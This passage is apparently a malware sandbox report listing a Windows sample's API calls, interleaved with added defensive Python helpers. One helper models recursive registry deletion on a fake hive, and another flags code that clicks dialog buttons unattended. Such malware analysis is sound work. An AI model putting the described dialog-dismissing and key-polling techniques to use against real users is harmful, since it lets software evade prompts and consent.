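def triage_report(records: Dict[str, str] = REPORT_RECORDS) -> Dict[str, Dict[str, object]]:
    return {ref: triage(text) for ref, text in records.items()}


if __name__ == "__main__":
    for ref, result in triage_report().items():
        print(ref, result)
```

Run it as-is to see the three records classified; to triage a full report, paste the "APIs" bullets of each function into REPORT_RECORDS or feed them through `triage` one record at a time. The matcher deliberately ignores argument values except for the two cases where they carry meaning here (the string name given to GetProcAddress, and the STM_SETIMAGE message id), so that `?` placeholders from the static analysis do not break a match.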

APIs
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
• GetSystemMetrics.USER32(0000000F), ref: 00A2A990
• GetSystemMetrics.USER32(00000011), ref: 00A2A9A7
• GetSystemMetrics.USER32(00000004), ref: 00A2A9B3
• GetSystemMetrics.USER32(0000000F), ref: 00A2A9C9
• MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00A2AC15
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A2AC33
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A2AC54
• ShowWindow.USER32(00000003,00000000), ref: 00A2AC73
• InvalidateRect.USER32(?,00000000,00000001), ref: 00A2AC95
• DefDlgProcW.USER32(?,00000005,?), ref: 00A2ACBB
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 5eaf22612b144409fcf9af6b0acd517f80a6d03642c9227a69226c27bb3f8171
                                                                                                                                                                                                                                  • Instruction ID: 87adf6f5fda00e9d603b5bc529e10740794d223141b5657b0ca5dc0402617452
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eaf22612b144409fcf9af6b0acd517f80a6d03642c9227a69226c27bb3f8171
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32B17931600229EFDF14CFADD9847BE7BB2BF54700F188079ED45AA296D770A981CB61
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 009F52E6
• GetWindowTextW.USER32(?,?,00000400), ref: 009F5328
• _wcslen.LIBCMT ref: 009F5339
• CharUpperBuffW.USER32(?,00000000), ref: 009F5345
• _wcsstr.LIBVCRUNTIME ref: 009F537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 009F53B2
• GetWindowTextW.USER32(?,?,00000400), ref: 009F53EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 009F5445
• GetClassNameW.USER32(?,?,00000400), ref: 009F5477
• GetWindowRect.USER32(?,?), ref: 009F54EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 9e9171be04c3927ed23a6b0a535747982edc533540d04df8327827ca2ab871a2
• Instruction ID: 60c3621bfeee3cc3ca0f28dc9e86136bb7cbbcf663d0cd1ef3bea533ee37ea5a
• Opcode Fuzzy Hash: 9e9171be04c3927ed23a6b0a535747982edc533540d04df8327827ca2ab871a2
• Instruction Fuzzy Hash: CB91C171104A0AAFDB14DF28D984BBAB7ADFF40304F114529FB9A82091EB71ED56CB91
APIs
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A297B6
• GetFocus.USER32 ref: 00A297C6
• GetDlgCtrlID.USER32(00000000), ref: 00A297D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00A29879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A2992B
• GetMenuItemCount.USER32(?), ref: 00A29948
• GetMenuItemID.USER32(?,00000000), ref: 00A29958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A2998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A299CC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A299FD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0
• API String ID: 1026556194-4108050209
• Opcode ID: 3474e7bed99dbcc41b0827c7558774f7ad69efb3ed21ff836953b63262b472bf
• Instruction ID: 16807a39ea782df2a6fdc50daf688f2f07cc2e949b4aa446fc3844b2e4fea267
• Opcode Fuzzy Hash: 3474e7bed99dbcc41b0827c7558774f7ad69efb3ed21ff836953b63262b472bf
• Instruction Fuzzy Hash: AC81C1715083219FD720CF28E984AAB7BE8FF89B54F04053DF98597291D770D906CBA2
APIs
• GetMenuItemInfoW.USER32(00A629C0,000000FF,00000000,00000030), ref: 009FC973
• SetMenuItemInfoW.USER32(00A629C0,00000004,00000000,00000030), ref: 009FC9A8
• Sleep.KERNEL32(000001F4), ref: 009FC9BA
• GetMenuItemCount.USER32(?), ref: 009FCA00
• GetMenuItemID.USER32(?,00000000), ref: 009FCA1D
• GetMenuItemID.USER32(?,-00000001), ref: 009FCA49
• GetMenuItemID.USER32(?,?), ref: 009FCA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009FCAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FCAEB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FCB0C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
• Opcode ID: 797c34c337b406ace1900f68ab2d1b884313a59c22a460d9ef00bf7e47217c0a
• Instruction ID: 149040a5e6a8634d6affe59be123ee8c9f5815593e3dfff9c2d5cf4c511fccaa
• Opcode Fuzzy Hash: 797c34c337b406ace1900f68ab2d1b884313a59c22a460d9ef00bf7e47217c0a
• Instruction Fuzzy Hash: DF618FB090024DAFDF21CFA8DA89AFE7BB8FB45348F148455EA11A7251D774ED42CB60
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 009FE4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009FE4FA
• _wcslen.LIBCMT ref: 009FE504
• _wcsstr.LIBVCRUNTIME ref: 009FE554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009FE570
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: af2a36d99fc9f59691561e7420bd853ca78c4a4d6d00439c62e46ebc03b94dc2
• Instruction ID: 50d54d3d2c310c115a52833d8fc08b9986709279116723a060b516f8dd7ca796
• Opcode Fuzzy Hash: af2a36d99fc9f59691561e7420bd853ca78c4a4d6d00439c62e46ebc03b94dc2
• Instruction Fuzzy Hash: 8C41E57290421C7AEB14AB789D47FFF77ACEF95720F100465FA00E6092EB799A0193A5
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A1D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A1D7A8
  • Part of subcall function 00A1D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A1D70A
  • Part of subcall function 00A1D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A1D71D
  • Part of subcall function 00A1D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A1D72F
  • Part of subcall function 00A1D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A1D765
  • Part of subcall function 00A1D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00A1D753
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: e6de34f3029fa05f935a2bf83c63499c9d794e51b25ababea96ace399b7dae4a
• Instruction ID: d7c80cbcb2b19c3ecd8cb0af78c7cfd664714dbd9e2f1bc19408578489d1dec0
• Opcode Fuzzy Hash: e6de34f3029fa05f935a2bf83c63499c9d794e51b25ababea96ace399b7dae4a
• Instruction Fuzzy Hash: CC318D72A01128BBDB20DB94DC88EFFBB7CEF46750F040565B806E2151DB349E869AA0
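The call sequence in the function above (RegEnumKeyExW always asked for subkey index 0, RegOpenKeyExW, a recursive call back into the same function at 00A1D694, then RegDeleteKeyW, with advapi32!RegDeleteKeyExW resolved through GetProcAddress rather than imported) is the standard way to remove a whole registry subtree: RegDeleteKeyW refuses a key that still has subkeys, so children must go first, and the dynamic lookup lets the code fall back to RegDeleteKeyW where RegDeleteKeyExW is unavailable. The Python below is an added example, not code from the sample or from Joe Sandbox. It models that recursion against a constructed in-memory key tree (the FakeHive class is an assumption standing in for the real API and touches no real registry) and contrasts it with a naive index-counting loop, which the real API breaks because the remaining subkeys shift down after every deletion.

```python
class FakeHive:
    """Constructed stand-in for a registry hive: each key is a dict of subkey name -> subtree.

    Assumption for this example only; it mimics the two behaviours that matter here:
    subkeys are enumerated by index, and a key with children cannot be deleted.
    """

    def __init__(self, tree):
        self.tree = tree
        self.deleted = []  # paths in the order delete_key succeeded

    def _node(self, path):
        node = self.tree
        for part in (path.split("\\") if path else []):
            node = node[part]
        return node

    def enum_subkey(self, path, index):
        # Like RegEnumKeyExW: return the index-th subkey name, or None past the end.
        names = sorted(self._node(path))
        return names[index] if index < len(names) else None

    def delete_key(self, path):
        # Like RegDeleteKeyW: fails (returns False) if the key still has subkeys.
        parent, _, name = path.rpartition("\\")
        if self._node(path):
            return False
        del self._node(parent)[name]
        self.deleted.append(path)
        return True


def delete_tree(hive, path):
    """Recursive delete as the listing does it: always fetch subkey 0, recurse, repeat.

    After each child is removed the next child becomes index 0 again, so this loop
    drains the key completely before deleting the key itself.
    """
    while True:
        child = hive.enum_subkey(path, 0)
        if child is None:
            break
        delete_tree(hive, path + "\\" + child)
    return hive.delete_key(path)


def delete_tree_naive(hive, path):
    """Counter-example: walking indices 0, 1, 2 ... skips every other subkey.

    Deleting subkey 0 shifts the rest down, so index 1 now names what was index 2.
    """
    i = 0
    while True:
        child = hive.enum_subkey(path, i)
        if child is None:
            break
        delete_tree_naive(hive, path + "\\" + child)
        i += 1
    return hive.delete_key(path)


if __name__ == "__main__":
    # Constructed tree; the key names are illustrative, not values from the sample.
    hive = FakeHive({"Software": {"Vendor": {"App": {"Run": {}, "Settings": {"Cache": {}}}, "Other": {}}}})
    print("index-0 recursion:", delete_tree(hive, "Software\\Vendor\\App"), hive.deleted)
    hive2 = FakeHive({"K": {"a": {}, "b": {}, "c": {}}})
    print("index-counting loop:", delete_tree_naive(hive2, "K"), "left behind:", list(hive2.tree["K"]))
```

The same ordering rule applies when reproducing or cleaning up after the sample: delete leaf keys before parents, and re-enumerate from index 0 after every deletion rather than caching the subkey list.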
APIs
• timeGetTime.WINMM ref: 009FEFCB
  • Part of subcall function 009AF215: timeGetTime.WINMM(?,?,009FEFEB), ref: 009AF219
• Sleep.KERNEL32(0000000A), ref: 009FEFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 009FF01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009FF03E
• SetActiveWindow.USER32 ref: 009FF05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009FF06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 009FF08A
• Sleep.KERNEL32(000000FA), ref: 009FF095
• IsWindow.USER32 ref: 009FF0A1
• EndDialog.USER32(00000000), ref: 009FF0B2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 963f8d454afd8d9c515b2018848c63140af43ad4b842c842757d4b7ff1f89ac3
• Instruction ID: 70c28c76bcd3fc6806ef0cc1bd1522e0746ca1d98c3753543cf88d3b5b91de2d
• Opcode Fuzzy Hash: 963f8d454afd8d9c515b2018848c63140af43ad4b842c842757d4b7ff1f89ac3
• Instruction Fuzzy Hash: BA218E76540208BFEB20AFA4EC89B367B79FB59745B044034FA01822B3EBB58C038B51
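The listing above records message and key constants as raw hex (000000F5, 00000010, 000000A0 and so on), which hides what the function does: it waits, enumerates the thread's windows, finds a BUTTON control, activates it, sends it BM_CLICK (0x00F5), sends WM_CLOSE (0x0010), waits again and ends the dialog, i.e. it dismisses a dialog with no user present. The Python below is an added triage helper, not part of this report or of the sample. It parses API lines in exactly the form printed here, resolves the constants that matter for this function and for the GetAsyncKeyState/GetKeyState calls recorded later in this dump (standard Win32 values for BM_CLICK, WM_CLOSE and the virtual-key codes), and flags the find-BUTTON-then-BM_CLICK pattern. The sample lines are copied from this page; the handling of the three-argument SendMessageW line assumes the dump dropped the hwnd argument, which is labelled as an assumption in the output.

```python
import re
from dataclasses import dataclass

# One Joe Sandbox API line: "Api.MODULE(arg,arg,...), ref: ADDR" or "Api.MODULE ref: ADDR".
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)"          # e.g. SendMessageW.USER32
    r"(?:\((?P<args>[^)]*)\))?"             # optional recorded argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"   # call-site address
)

# Standard Win32 constants (only the ones this dump uses).
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK"}
VIRTUAL_KEYS = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
                0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


@dataclass
class Call:
    api: str
    module: str
    ref: int
    args: list
    note: str = ""


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None                      # value the sandbox could not recover
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)              # 32-bit immediate
    return tok                           # string literal such as BUTTON, or a symbol name


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return Call(m.group("api"), m.group("mod"), int(m.group("ref"), 16), args)


def annotate(call):
    a = call.args
    if call.api == "Sleep" and a and isinstance(a[0], int):
        call.note = f"sleep {a[0]} ms"
    elif call.api.startswith("SendMessage"):
        # Real signature is (hwnd, msg, wParam, lParam). With only three args recorded
        # the message id is a guess; we assume hwnd was the argument dropped.
        if len(a) == 4 and isinstance(a[1], int):
            call.note = WINDOW_MESSAGES.get(a[1], f"msg 0x{a[1]:04X}")
        elif len(a) == 3 and isinstance(a[0], int):
            name = WINDOW_MESSAGES.get(a[0], "unknown")
            call.note = f"3 args recorded; 0x{a[0]:04X} = {name} assuming hwnd was dropped"
    elif call.api in ("GetAsyncKeyState", "GetKeyState") and a and isinstance(a[0], int):
        call.note = VIRTUAL_KEYS.get(a[0], f"vk 0x{a[0]:02X}")
    elif call.api.startswith("FindWindowEx") and len(a) >= 3 and isinstance(a[2], str):
        call.note = f"class {a[2]}"
    return call


def decode_listing(text):
    """Parse every API line in the text and attach a human-readable note."""
    calls = [parse_line(l) for l in text.splitlines() if l.strip()]
    return [annotate(c) for c in calls if c]


def clicks_button_unattended(calls):
    """True if a BUTTON control is located and then sent BM_CLICK in this function."""
    found_button = False
    for c in calls:
        if c.api.startswith("FindWindowEx") and c.note == "class BUTTON":
            found_button = True
        elif found_button and c.api.startswith("SendMessage") and c.note == "BM_CLICK":
            return True
    return False


# Sample input copied from the API list above (plus two key-state lines from this dump).
SAMPLE_LINES = """
timeGetTime.WINMM ref: 009FEFCB
Sleep.KERNEL32(0000000A), ref: 009FEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 009FF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009FF03E
SetActiveWindow.USER32 ref: 009FF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009FF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 009FF08A
Sleep.KERNEL32(000000FA), ref: 009FF095
IsWindow.USER32 ref: 009FF0A1
EndDialog.USER32(00000000), ref: 009FF0B2
GetAsyncKeyState.USER32(000000A0), ref: 009FAA64
GetKeyState.USER32(0000005B), ref: 009FAB63
"""

if __name__ == "__main__":
    decoded = decode_listing(SAMPLE_LINES)
    for c in decoded:
        print(f"{c.ref:08X} {c.api:<20} {c.note}")
    print("dismisses dialogs unattended:", clicks_button_unattended(decoded))
```

Run it against any function's API list pasted from the report; the BM_CLICK/WM_CLOSE pair after FindWindowExW(BUTTON) is the signal to look for when deciding whether a sample silently clears prompts such as installer or security dialogs.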
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009FF374
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009FF38A
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009FF39B
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009FF3AD
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009FF3BE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 7c49d52ed8cd60c7019c886890567db89467936be8f64d08dadee12564bef966
• Instruction ID: 535d6d02f9106c95f2ea46556887c5830136f2a7a652800dc8f3aa13cc186194
• Opcode Fuzzy Hash: 7c49d52ed8cd60c7019c886890567db89467936be8f64d08dadee12564bef966
• Instruction Fuzzy Hash: C9119171A5026D79DB20A6A9EC5AEFF6A7CFFD5B40F0008297901E20D1EAB05949C6F0
APIs
• GetKeyboardState.USER32(?), ref: 009FA9D9
• SetKeyboardState.USER32(?), ref: 009FAA44
• GetAsyncKeyState.USER32(000000A0), ref: 009FAA64
• GetKeyState.USER32(000000A0), ref: 009FAA7B
• GetAsyncKeyState.USER32(000000A1), ref: 009FAAAA
• GetKeyState.USER32(000000A1), ref: 009FAABB
• GetAsyncKeyState.USER32(00000011), ref: 009FAAE7
• GetKeyState.USER32(00000011), ref: 009FAAF5
• GetAsyncKeyState.USER32(00000012), ref: 009FAB1E
• GetKeyState.USER32(00000012), ref: 009FAB2C
• GetAsyncKeyState.USER32(0000005B), ref: 009FAB55
• GetKeyState.USER32(0000005B), ref: 009FAB63
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                  • Opcode ID: 5a4bb0c14c2f030ecee5d92a7a36c465b78358cdcf71f082cce988744d18f7e3
                                                                                                                                                                                                                                  • Instruction ID: ab3f9ebd6ea30ce2bc9402ac1dba5265d42ee66121f2bc414c8f5e1263e8cfe0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a4bb0c14c2f030ecee5d92a7a36c465b78358cdcf71f082cce988744d18f7e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D651F9A0A0478C29FB35DBB48850BFABFB99F11340F084599D6C61B1C2DA94DB8CC763
APIs
• GetDlgItem.USER32(?,00000001), ref: 009F6649
• GetWindowRect.USER32(00000000,?), ref: 009F6662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009F66C0
• GetDlgItem.USER32(?,00000002), ref: 009F66D0
• GetWindowRect.USER32(00000000,?), ref: 009F66E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009F6736
• GetDlgItem.USER32(?,000003E9), ref: 009F6744
• GetWindowRect.USER32(00000000,?), ref: 009F6756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009F6798
• GetDlgItem.USER32(?,000003EA), ref: 009F67AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009F67C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 009F67CE
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 275701695e50548dd0cbe6ec29e962aa34cd2bae28a27b88bb7c69a65524caa3
• Instruction ID: 605f5849c57369d4cb7eb553e49723185c905dd7f49fcb77f6a736583e2efe99
• Opcode Fuzzy Hash: 275701695e50548dd0cbe6ec29e962aa34cd2bae28a27b88bb7c69a65524caa3
• Instruction Fuzzy Hash: 8C512F71A00309AFDB18DFA8CD89ABEBBB9FB48315F108139F515E6291D7749D058B50
APIs
  • Part of subcall function 00991802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00991488,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 00991865
• DestroyWindow.USER32(?), ref: 00991521
• KillTimer.USER32(00000000,?,?,?,?,0099145A,00000000,?), ref: 009915BB
• DestroyAcceleratorTable.USER32(00000000), ref: 009D29B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 009D29E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 009D29F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000), ref: 009D2A15
• DeleteObject.GDI32(00000000), ref: 009D2A27
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
